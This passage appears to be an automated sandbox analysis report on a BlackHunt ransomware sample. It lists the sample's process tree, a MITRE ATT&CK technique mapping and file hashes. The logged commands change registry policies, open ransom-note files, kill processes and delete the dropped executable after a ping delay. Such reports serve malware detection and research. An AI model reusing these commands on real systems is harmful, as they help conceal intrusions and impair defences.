C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableTaskMgr" /t REG_DWORD /d 0 /f2⤵PID:12716
-
C:\Windows\system32\reg.exereg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableTaskMgr" /t REG_DWORD /d 0 /f3⤵PID:12596
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c notepad.exe C:\ProgramData\#BlackHunt_ReadMe.txt2⤵PID:11740
-
C:\Windows\system32\notepad.exenotepad.exe C:\ProgramData\#BlackHunt_ReadMe.txt3⤵PID:10940
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c taskkill /IM mshta.exe /f2⤵PID:11732
-
C:\Windows\system32\taskkill.exetaskkill /IM mshta.exe /f3⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:11852
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "NoRun" /t REG_DWORD /d 0 /f2⤵PID:11724
-
C:\Windows\system32\reg.exereg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "NoRun" /t REG_DWORD /d 0 /f3⤵PID:10324
-
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c ping 127.0.0.1 -n 5 > nul & del "C:\Users\Admin\AppData\Local\Temp\49fa81efbb72fe5659f7b4e8ac3d75c5edd2b870d45d5eeea7e310c2ecac86e7.exe"2⤵PID:12684
-
C:\Windows\SysWOW64\PING.EXEping 127.0.0.1 -n 53⤵
- Runs ping.exe
PID:8944
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c C:\ProgramData\#BlackHunt_ReadMe.hta2⤵
- Checks computer location settings
- Modifies registry class
PID:12516 -
C:\Windows\SysWOW64\mshta.exe"C:\Windows\SysWOW64\mshta.exe" "C:\ProgramData\#BlackHunt_ReadMe.hta" {1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}{1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}3⤵PID:13220
-
-
-
C:\Windows\system32\vssvc.exeC:\Windows\system32\vssvc.exe1⤵
- Suspicious use of AdjustPrivilegeToken
PID:5812
-
C:\Windows\system32\wbengine.exe"C:\Windows\system32\wbengine.exe"1⤵
- Suspicious use of AdjustPrivilegeToken
PID:9084
-
C:\Windows\System32\vdsldr.exeC:\Windows\System32\vdsldr.exe -Embedding1⤵PID:12320
-
C:\Windows\System32\vds.exeC:\Windows\System32\vds.exe1⤵
- Checks SCSI registry key(s)
PID:8340
Network
MITRE ATT&CK Enterprise v15
Persistence
Boot or Logon Autostart Execution
1Registry Run Keys / Startup Folder
1Create or Modify System Process
1Windows Service
1Scheduled Task/Job
1Privilege Escalation
Abuse Elevation Control Mechanism
1Bypass User Account Control
1Boot or Logon Autostart Execution
1Registry Run Keys / Startup Folder
1Create or Modify System Process
1Windows Service
1Scheduled Task/Job
1Defense Evasion
Abuse Elevation Control Mechanism
1Bypass User Account Control
1Impair Defenses
2Disable or Modify Tools
2Indicator Removal
4File Deletion
3Modify Registry
5Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
1KB
MD568c4c1e0f76b4970ebff8fd6f9bbabd0
SHA10728849547e8d5a2807bbaf3973673eefbcf87bd
SHA2569fc0995d896926d403ab22dee5693cd808d14c2e5aedac3fee4ea1812e02978c
SHA51283caa9392386cd0e0c0bf41ccd9ede57df0464f955cdc094b9c2a9df7e518bd823886a64acd6208cde767c4e4c36b5dfb0518cab4350c5a4b63bbc358415fc09
-
Filesize
12KB
MD5d47ef707522c16fcca0b2dbdb49f012b
SHA1062d54678e42b34c8b9cb660c72d9a8186a71bd8
SHA2567e1f52840ff6f4a7c03c3870a8377c0f83fd54a672f86aef11e6677a92e13a74
SHA512a060d686b8f63166094efa65d0dd328409dc261d344419f875739e085eee55c1ea2326ef2f4d6a52b8aebc58bd7eb0611b75018e8d6e4c441b3d50bdb1537973
-
Filesize
684B
MD52742af7fc6573c04e817b4431a8ef5ae
SHA1f1f40b7102364cb5bd138a5996b4d2f32bbac147
SHA256cef802af0e9358fb125eafc8d0f29aa7d31e9202a6902189bd1d62297b987614
SHA51251a3139fe6af6f0717ca91a6cbd309a3fd88b2b76070586862de9988c3968c4e89a49ff7e6292d48eed2ed9b28fe110cd70dea826a2ab16824dfce4cb0804da7